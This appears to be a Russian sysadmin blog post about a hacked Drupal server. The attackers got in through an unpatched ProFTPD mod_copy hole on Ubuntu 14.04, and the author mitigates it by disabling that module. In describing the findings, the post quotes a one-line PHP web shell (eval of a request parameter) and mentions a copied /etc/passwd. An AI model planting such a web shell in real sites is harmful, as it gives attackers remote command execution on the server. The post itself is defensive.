Не пофиксенная уязвимость Proftpd в ubuntu.

Недавно столкнулся с ситуацией, когда сайт на drupal взламывали из зо дня в день, на нем появлялось все больше и больше гадости рассылающих спам, и делающих прочие нехорошие вещи. На сервере установлена ubuntu 14.04 полностью обновленная, сайт на drupal(не лучшая cms, но это не мое дело) тоже последней версии. Ничего не предвещало беды, но я вспомнил, что proftpd частенько падал на серваке, загуглив впроблему я выяснил, что в этом виноват скрипт запуска после ротации логов. Если кому интересно нужно открыть /etc/init.d/proftpd, найти и изменить следующую строчку
start-stop-daemon --stop --signal $SIGNAL --quiet --pidfile
на
start-stop-daemon --stop --signal $SIGNAL --retry 1 --quiet --pidfile "$PIDFILE"
и будет все отлично, но сейчас не об этом.


В общем зайдя в каталог /tmp я заметил 2 странных файла, которые вызывали подозрение на взлом.
1. /etc/passwd.copy, файл с данными о пользователях в /tmp, недобрый знак.
2. <?php eval($_REQUEST[cmd]); ?> — ну это было вообще палево.
Отправился в google, и в первой же ссылки выяснил, что вирусню заливали через proftpd.
Статья на хабре [ https://habrahabr.ru/post/257027/ ] на opennet [ https://www.opennet.ru/opennews/art.shtml?num=42015 ]
Недолго думая проверил proftpd на уязвимость, и какое ж было мое удивление, что полностью обновленный сервер, подвержен прошлогодней дыре…
Фикса в пакетах я не нашел, поэтому просто отключил следующий модуль mod_copy.c ведь в нем же уязвимость :-).
Для этого откройте файл /etc/proftpd/modules.conf, найдите строчку LoadModule mod_copy.c и либо ее удалить либо закомментируйте #LoadModule mod_copy.c Не забудьте перезапустить proftpd /etc/init.d/proftpd restart.
Проверить отключен ли данный модуль, можно командой proftpd -vv | grep copy

Комментарии ()

    Есть вопрос или предложение пиши в Telegram @cloudsv

    Прямой эфир

    cloudsv 24 октября 2018, 00:27
    О жизни Обновление Scala Rider G4 0
    cloudsv 21 октября 2018, 23:16
    Arch Linux Памятка по основным утилитам Linux 0
    cloudsv 01 июня 2018, 01:39
    Telegram Настройка прокси mtproto для Telegram 28
    cloudsv 22 января 2018, 21:59
    Web Локальное зеркало обновлений Dr.web 0
    cloudsv 03 октября 2017, 10:55
    Web Пароль от резервной копии Bitrix 1
    cloudsv 09 июля 2017, 23:02
    Arch Linux Let's Encrypt это легко и просто 0